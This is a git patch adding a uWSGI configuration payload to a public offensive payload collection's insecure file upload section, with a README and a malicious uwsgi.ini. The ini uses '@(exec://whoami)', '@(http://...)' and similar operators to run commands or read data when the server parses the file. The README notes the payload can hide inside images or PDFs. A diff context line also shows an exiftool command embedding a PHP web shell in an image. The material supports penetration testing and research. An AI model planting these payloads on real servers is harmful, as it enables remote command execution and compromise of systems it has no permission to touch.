From 5f8b3f8a142d6620c40059fe345c396c31d6347e Mon Sep 17 00:00:00 2001
From: Maxence Schmitt <maxence@doyensec.com>
Date: Wed, 1 Mar 2023 14:49:31 +0100
Subject: [PATCH] add uwsgi configuration file to Upload Insecure File

---
 .../Configuration uwsgi.ini/README.md         | 32 +++++++++++++++++++
 .../Configuration uwsgi.ini/uwsgi.ini         | 13 ++++++++
 Upload Insecure Files/README.md               |  3 ++
 3 files changed, 48 insertions(+)
 create mode 100644 Upload Insecure Files/Configuration uwsgi.ini/README.md
 create mode 100644 Upload Insecure Files/Configuration uwsgi.ini/uwsgi.ini

diff --git a/Upload Insecure Files/Configuration uwsgi.ini/README.md b/Upload Insecure Files/Configuration uwsgi.ini/README.md
new file mode 100644
index 0000000..0407a88
--- /dev/null
+++ b/Upload Insecure Files/Configuration uwsgi.ini/README.md	
@@ -0,0 +1,32 @@
+# uWSGI configuration file
+
+uWSGI configuration files can include “magic” variables, placeholders and operators defined with a precise syntax. The ‘@’ operator in particular is used in the form of @(filename) to include the contents of a file. Many uWSGI schemes are supported, including “exec” - useful to read from a process’s standard output. These operators can be weaponized for Remote Command Execution or Arbitrary File Write/Read when a .ini configuration file is parsed:
+
+Example of malicious uwsgi.ini file:
+
+```ini
+[uwsgi]
+; read from a symbol
+foo = @(sym://uwsgi_funny_function)
+; read from binary appended data
+bar = @(data://[REDACTED])
+; read from http
+test = @(http://[REDACTED])
+; read from a file descriptor
+content = @(fd://[REDACTED])
+; read from a process stdout
+body = @(exec://whoami)
+; call a function returning a char *
+characters = @(call://uwsgi_func)
+```
+
+When the configuration file will be parsed(e.g. restart, crash or autoreload) payload will be executed.
+
+## uWSGI lax parsing
+
+The uWSGI parsing of configuration file is lax. The previous payload can be embedded inside a binary file(e.g. image, pdf, ...). 
+
+## Thanks to
+
+* [A New Vector For “Dirty” Arbitrary File Write to RCE - Doyensec - Maxence Schmitt and Lorenzo Stella](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html)
+
diff --git a/Upload Insecure Files/Configuration uwsgi.ini/uwsgi.ini b/Upload Insecure Files/Configuration uwsgi.ini/uwsgi.ini
new file mode 100644
index 0000000..7301b4c
--- /dev/null
+++ b/Upload Insecure Files/Configuration uwsgi.ini/uwsgi.ini	
@@ -0,0 +1,13 @@
+[uwsgi]
+; read from a symbol
+foo = @(sym://uwsgi_funny_function)
+; read from binary appended data
+bar = @(data://[REDACTED])
+; read from http
+test = @(http://[REDACTED])
+; read from a file descriptor
+content = @(fd://[REDACTED])
+; read from a process stdout
+body = @(exec://whoami)
+; call a function returning a char *
+characters = @(call://uwsgi_func)
\ No newline at end of file
diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md
index 15083b8..4813fb0 100644
--- a/Upload Insecure Files/README.md	
+++ b/Upload Insecure Files/README.md	
@@ -136,12 +136,14 @@ exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __h
 If you are trying to upload files to a :
 - PHP server, take a look at the [.htaccess](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20Apache%20.htaccess) trick to execute code.
 - ASP server, take a look at the [web.config](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config) trick to execute code.
+- uWSGI server, take a look at the [uwsgi.ini](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20uwsgi.ini/uwsgi.ini) trick to execute code.
 
 Configuration files examples
 - [.htaccess](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20Apache%20.htaccess)
 - [web.config](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config)
 - [httpd.conf](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20Busybox%20httpd.conf)
 - [\_\_init\_\_.py](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20Python%20__init__.py)
+- [uwsgi.ini](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20uwsgi.ini/uwsgi.ini)
 
 Alternatively you may be able to upload a JSON file with a custom scripts, try to overwrite a dependency manager configuration file.
 - package.json
@@ -214,3 +216,4 @@ Upload the XML file to `$JETTY_BASE/webapps/`
 * [A tip for getting RCE in Jetty apps with just one XML file! - Aug 4, 2022 - PT SWARM / @ptswarm](https://twitter.com/ptswarm/status/1555184661751648256/)
 * [Jetty Features for Hacking Web Apps - September 15, 2022 - Mikhail Klyuchnikov](https://swarm.ptsecurity.com/jetty-features-for-hacking-web-apps/)
 * [Inyección de código en imágenes subidas y tratadas con PHP-GD  - Spanish Resource - hackplayers](https://www.hackplayers.com/2020/03/inyeccion-de-codigo-en-imagenes-php-gd.html)
+* [A New Vector For “Dirty” Arbitrary File Write to RCE - Doyensec - Maxence Schmitt and Lorenzo Stella](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html)